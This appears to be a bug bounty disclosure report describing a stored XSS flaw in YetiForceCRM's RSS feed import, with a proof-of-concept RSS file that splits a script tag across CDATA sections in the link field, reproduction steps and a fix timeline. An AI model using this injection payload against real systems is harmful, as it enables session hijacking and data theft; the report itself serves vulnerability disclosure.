Stored XSS vulnerability when importing RSS Feeds from external source in yetiforcecompany/yetiforcecrm
Valid
Reported on
Aug 12th 2022
Description
YetiForceCRM allows user create RSS Feeds without purifying the link field of the input data properly from external source. An attacker can take advantage of this vulnerability to perform an XML Injection attack that leads to stored cross-site scripting (XSS) on the target server.
Proof of Concept
Payload
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>RSS Test</title>
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
<lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate>
<item>
<title>RSS Test</title>
<link>http://example.com</link>
<description>a post</description>
<author>user@example.com</author>
<pubDate>Fri, 12 Aug 2022 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
Reproduction steps
Step 1:Create a filerss_xss.xmlwith the content of the payload above
Step 2:Add Feed Source via module Rss
Step 3:Click Save and the XSS should fire
Impact
This vulnerability allows attackers to hijack the user's current session, steal relevant information, deface website or direct users to malicious websites,...
Occurrences
We are processing your report and will contact the
yetiforcecompany/yetiforcecrm
team within 24 hours.
9 months ago
We have contacted a member of the
yetiforcecompany/yetiforcecrm
team and are waiting to hear back
9 months ago
The researcher's credibility has increased: +7
We have sent a
fix follow up to the
yetiforcecompany/yetiforcecrm
team.
We will try again in 7 days.
9 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
RssFeedContents.tpl#L51
has been validated
to join this conversation